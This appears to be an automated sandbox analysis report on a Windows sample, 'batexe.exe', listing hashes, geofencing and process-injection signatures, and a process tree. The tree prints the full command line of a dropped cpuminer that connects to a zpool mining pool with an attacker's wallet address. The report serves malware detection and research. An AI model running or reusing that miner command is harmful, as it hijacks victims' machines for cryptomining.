Analysis
-
max time kernel
295s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
13-02-2024 06:37
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2444 b2e.exe 1500 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1500 cpuminer-sse2.exe 1500 cpuminer-sse2.exe 1500 cpuminer-sse2.exe 1500 cpuminer-sse2.exe 1500 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3376-7-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3376 wrote to memory of 2444 3376 batexe.exe 84 PID 3376 wrote to memory of 2444 3376 batexe.exe 84 PID 3376 wrote to memory of 2444 3376 batexe.exe 84 PID 2444 wrote to memory of 4716 2444 b2e.exe 85 PID 2444 wrote to memory of 4716 2444 b2e.exe 85 PID 2444 wrote to memory of 4716 2444 b2e.exe 85 PID 4716 wrote to memory of 1500 4716 cmd.exe 88 PID 4716 wrote to memory of 1500 4716 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\614A.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1500
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.1MB
MD51cb0fafeab20bf5e45ed4c595119913e
SHA16a509917a703a8c8819c35df71cd19726cb0685f
SHA256790098b763279c6ad9dc1eac1bb7b22e6fa57b6b217561c5400861ae5400f78a
SHA512cf72df020926a57d3be0e2b0c9d90c5407e4313aa0a55c2fc4d67b72b4603a01da9d912852ee3ca8468ddc311da4bdfe3f23150a9e85b8b34f9718530ccb9b4c
-
Filesize
4.3MB
MD53582cefb5f23f96942d0ffd6425d3f23
SHA1ddd6d6c35986cb1ca84a6fe51eeb3cc764b21ffa
SHA2563521d0f61cf86290f4d5796b51d80957e56f33c8bf8a86c5f4c6f5ff745bac73
SHA5122ddb5c1813d5b93c64f00974468bc137c5236ac9604ecbee24e55b6c5b06e782cc5635efc61eee3a5b6290c026c4bb64df2c25d47af494181480580a5e1e62f2
-
Filesize
3.2MB
MD57e1a9b43d578de1da1ab8437fe674c34
SHA1f0acbdff80cf90bbff4fcb30e9ba0324a528dd54
SHA2569366719e6a58bc512dfaf408276db4ae5b0bcccab5b48cdfad07015bd0b54e6c
SHA512a3f1d0b300d91f1a1767802afe3ffb74ad2c295453725660540e6d20635517480b07b10cfe3d7c9e320d1e32074918ee8500a8d19333e4e64c70272818db27ef
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
773KB
MD5e54a6d5b9800b833e82b5a3ec9ef820f
SHA1866f29795aebe509e7cbfebaee552123c91a207a
SHA256b5800aa93f82d5a809be93ddaf0cd6a9d6a4641cfe9b98f1c2de9df8c0eb8ace
SHA5127bba3c0d8ba8c4cf0961ee3f4d931dd730832677a90dae4bf2184ffa8b70113851fc52dd5e394f0ba6b64d5f3c63d62b8db432da9a2e310f72f559f42fa21081
-
Filesize
916KB
MD525f925ae801154d6c05c5730c5c77217
SHA1bfde927ae66875f4aa790c4ccb9329917f919159
SHA25695931d8056fb05cbb38218b7a6d122590409042c3ba6054877c1c73fe6473129
SHA5129af1f1ca1ab98c8824344551cb712071501f06b5a5b7a4fadab6be2e10c67e618a64a9c791c682bf521624f67bea43d48945630414e444f7e75850a82dcdfb22
-
Filesize
512KB
MD5a5993c0dd7587f1716037dcfe1f63091
SHA19a4d23ce36f5fc5791692b47d977c0bf92842879
SHA256568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3
SHA512c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12
-
Filesize
658KB
MD56ed2fd9ae1d7e61b654055657cb97c5b
SHA1dfe90feeb8648109003fea612ab4b68f3525aedb
SHA256351ae18dd5943b3ead13795efbff9ff113b4e6eeea0bb1708037790c3522846d
SHA512114c79d8c32b55b3ca1c591993d35d8ef2b074ef38693a40ef5bd95aa2de9676f8f3a28b8a57bc0fb0fecb61f295b4d834230cdabc798b982bc2bc0cf0febfc0
-
Filesize
1.1MB
MD560b25308ef0249bbd3dc61c08bb2c3ef
SHA17d11f7700e27e83c474f736d5d82ba463cc8f559
SHA256b89f3993535add1423e70d1bba98c54c977c2bb4e95319c834716a19a908bec8
SHA51225d44faabf9a911113221b116467bac85b2abbc65cc8555c62830829f8f5d142ff3e9aa10a73f68c476fb94aa5d76d057cd722071aa5f182523a8a9ca27e5bb9
-
Filesize
1.0MB
MD5859ea09a1969db4c5ecb8a73dd637b71
SHA177a39b53a61f6c21a68469d92f91995fda07d968
SHA256f8c79db5d6e98df00e22a1d546488168bdb0f8c076a8daa131b48c35706b3806
SHA512213b3b2b5f326eb89669c9a537e897bc54e388c7800d396d0ac89fc7728ec8b7dc9eb26c266700f69d9faae2905483466016e7dd0ed7a49ce19832973ad00faa
-
Filesize
1.0MB
MD52e986b7735be6b42f51a8ebced02a146
SHA14f60231a36b79f83de5cdb55ad1f4aaebf76fc8d
SHA256403de2701b23c9015861a331fc5b2d2172c8717d0051e47b07086c317a751fe1
SHA512251dd976e74425996cb0cc50da35bba697d8ddde075f6494994e921c31f7bfce6c7ff33a6d9c8d462047d4a703971e2f5af37918d8496ae2c7c6a4459b8a7597
-
Filesize
816KB
MD5e21b6fac6cf4f43740e829438b3fc264
SHA145fc5cd1a422e33ee92ba448e0bbee55f2e079cd
SHA256b84f07d61cd1ea1f25ee256b70ca8f2db97ca7726457a3a7f61bbc790e1145b8
SHA51250c3696ad6f3dc500ef2f7705a3fb10aaeb85891985f146a26787c539fa9de30c7e8b8a74fc079088501f05adcba258cf7dd02618b1df48a05ad72b38ab7234d
-
Filesize
747KB
MD51c876d00f7880089c2c3292b3d5a1af0
SHA1af4e09d1309d7a46f64c48910e19b5b65db66a37
SHA256d3a8c4252e4d5defef1a2c137bf7142079ffb142b2a942597dd2d2088c58c9d1
SHA512b2770a28a538ee3810af54319f1fb416ba6b9aff8ad9c1fb81b799794216badc53aa262a199103b634598c9e66fb04882a73b96c3fcc5820945b70af6a029a11
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
589KB
MD56ff5afc8925aa3c831b95ad907152520
SHA1d08d17819269c48d26fc0788bf81aabffbca3a3c
SHA256b420d84443dabd6ecf596759ccdd26273a7a55e4a333b34f2059dd93f040332e
SHA512e17ad68795020302afff18a6617299f7e9291cbaeb44864a1512a59dc0a6b4c71a1237fef850060a89f7f3107e91bb1b60cfa8ddc592cc615f3eff16f6d7ce67